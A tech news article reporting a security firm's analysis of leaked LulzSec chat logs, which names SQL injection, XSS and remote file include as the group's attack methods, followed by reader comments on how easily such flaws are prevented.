Skip to main content

Report: LulzSec Used SQL Injection, XSS and RFI

Tuesday night security firm Impervia sent over a copy of a report set to go live Wednesday at noon PST, detailing its findings after analyzing the leaked LulzSec chat logs provided by The Guardian. Essentially the now-disbanded hacker group used three attack vectors: SQL Injection, Cross Site Scripting (XSS) and Remote File Include (RFI). The report thus points out the SQL Injection and XSS are the most common Web security vulnerabilities, and that enterprise security continues to ignore these two common vulnerabilities.

"Lulzsec was a team of hackers focused on breaking applications and databases," the company reports. "There were no virus or malware experts. Even their approach to distributed denial of service (DDoS) attacks relied on weaknesses in applications. We hope this episode helps bring attention to the fact that the center of gravity has shifted from firewalls and anti-virus to applications and databases. For security, this does not mean 'we have updated our anti-virus and put in place a network firewall.' Rather, it means 'we have identified all sensitive data and have put in place technology with the audit and protection capabilities required to safeguard that data.'"

The report, written by Impervia director of security strategy Rob Rachwald, then goes on to break down the three LulzSec tools – Remote File Include, SQL Injection and Cross site Scripting – which also includes chat log references. Here's the full scoop:

Tool #1: Remote File Include

The relevant snippet from the chat log (emphasis ours):

lol - storm would you also like the RFI/LFI bot with Google bypass i was talking about while i have this plugged in?

Remember that lol is Kayla who brought a bot army to Lulsec’s toolbox. The key in the snippet above is "RFI" or remote file include. We published an extensive overview (pdf) of RFI about two months ago. Lulzsec used RFI to get bots to DDoS websites, which is how they brought down the CIA's public site.

In our report, we said that RFI "attacks have the potential to cause as much damage as the more popular SQL Injection and Cross-Site Scripting (XSS) attacks." We also noted that RFI is "not widely discussed." The key here is "not widely discussed." In other words, Lulzsec used an often overlooked vulnerability to help ambush their targets. An RFI attack inserts some nasty code into a web application server. What does the code do? Usually, RFI is used to take over the web application and steal data. In the case of Lulzsec, they used it to conduct DDoS attacks. The second line, "8,000 RFI with usp flooder" tells you that lol had 8000 infected servers (not PCs!) to conduct the DDoS attacks. That’s pretty sizable. How much so? In our webinar on DDoS 2.0, we estimated that one infected server is equal to 3,000 bot infected PCs, so 8,000 server would be like 2.5M PCs.

Finally, our report gives some suggestions on countering RFI attacks.

Tool #2: SQL Injection

Jun 03 13:18:44 [redacted] you mean with the coupons?
Jun 03 13:18:57 [redacted] was it from that SQLi
Jun 03 13:21:57 sabu yeah

Volumes have been written about SQL injection. What more can we possibly write about the biggest vulnerability in the history of mankind that is the cause of millions of lost data records? We described in detail here how SQL injection may have helped with the PBS hack.

Tool #3: Cross Site Scripting

May 31 11:19:38 [redacted] XSS in billoreilly lol

Again, volumes on XSS. What more can we possibly write about the 2nd biggest vulnerability in the history of mankind that is the cause of millions of lost data records?

"Just goes to show you that LulzSec was not doing anything revolutionary," Impervia said.

  • officeguy
    They disbanded because the government and companies were investigating them, NOT because they 50 days are up. I guess they think the public is suppose to believe them. They are cowards hiding behind a computer just like criminals who rob people wearing masks. People who agree on what they did needs to get their head checked!!!
    Reply
  • modinn
    Not a huge shock, as I've rarely seen anyone defend the skill set of these guys. And although I do not condone these attacks in the slightest, it does raise the question: Why have all companies not implemented and/or developed better solutions to XSS and SQL injection attacks?

    You don't have to spend millions and millions of dollars to defend against SQL injection or XSS, they are very well established exploits and can easily be defended against or deterred. Plus it leaves traces, especially if the company has taken steps to make it harder to access SQL command injection. Fix the easy stuff that all crackers can easily exploit (like Lulzsec has) first, and then move on to the harder stuff meant for professional crackers.

    All this talk about building an impenetrable fortress of internet security. It doesn't matter how many packet sniffers, IP loggers, firewalls, or intrusion detectors you have surrounding your fortress, if you don't have a good foundation (essential security fixes), then the fortress will collapse on itself. These guys didn't care about whether their hacks were quiet or not. They WANTED the publicity and that's what made these attacks so successful.

    Reply
  • gm0n3y
    SQL Injection and XXS are so easy to prevent too. You don't need to be an intelligent programmer to prevent them, just use the latest standards (or even any standards made in the last 5 years or so) and they automatically prevent it. In asp.net you have to override specific settings to allow XXS and don't use dynamic SQL. It may be easier to write, but I have yet to see a case where you couldn't code around the need to use it.
    Reply
  • illo
    who cares why they were disbanded? they proved, much like anon has, that simple attacks are still way to effective to bother with trying any revolutionary hacks.

    We dont live in a world that allows people to leave there cars running while they go shopping. We live in a world that has crime, and lulzsec and anon have continually proven that if a major cyberwar happens, the US and major corporations have little defenses in place to defend against them.

    Reply
  • restatement3dofted
    officeguyThey disbanded because the government and companies were investigating them, NOT because they 50 days are up. I guess they think the public is suppose to believe them. They are cowards hiding behind a computer just like criminals who rob people wearing masks. People who agree on what they did needs to get their head checked!!!
    How's the view from up there?
    Reply
  • tomrippity02
    restatement3doftedHow's the view from up there?
    my thoughts exactly.
    Reply
  • hoofhearted
    That makes sense. Firewalls and such that are meant to keep people out are no good against these types of attacks, since they are using the same routes that normal application usage would use.
    Reply
  • the_krasno
    gm0n3ySQL Injection and XXS are so easy to prevent
    aaaaaaaaaaaaaaaaaaaaaaand the CIA got hacked too. This is sad.

    Reply
  • wcnighthawk
    So the phrase "Who's the bigger fool, the fool or the fool that follows" is the first thing I thought when reading this article. I see a lot of comments on Lulzsec about them being no skilled amateurs, using kiddie scripts and basic hacking tools. That may be true, but what's worse. No skill amateurs using old school type hacks or the companies/goverment that chose to ignore easily patchable loopholes into their systems and allow the hacks to suceed?
    Reply
  • dgingeri
    gm0n3ySQL Injection and XXS are so easy to prevent too. You don't need to be an intelligent programmer to prevent them, just use the latest standards (or even any standards made in the last 5 years or so) and they automatically prevent it. In asp.net you have to override specific settings to allow XXS and don't use dynamic SQL. It may be easier to write, but I have yet to see a case where you couldn't code around the need to use it.
    True you don't have to be a smart programmer to prevent these things. You just have to not be a lazy programmer. Lazy is the biggest problem in the US and Europe these days.
    Reply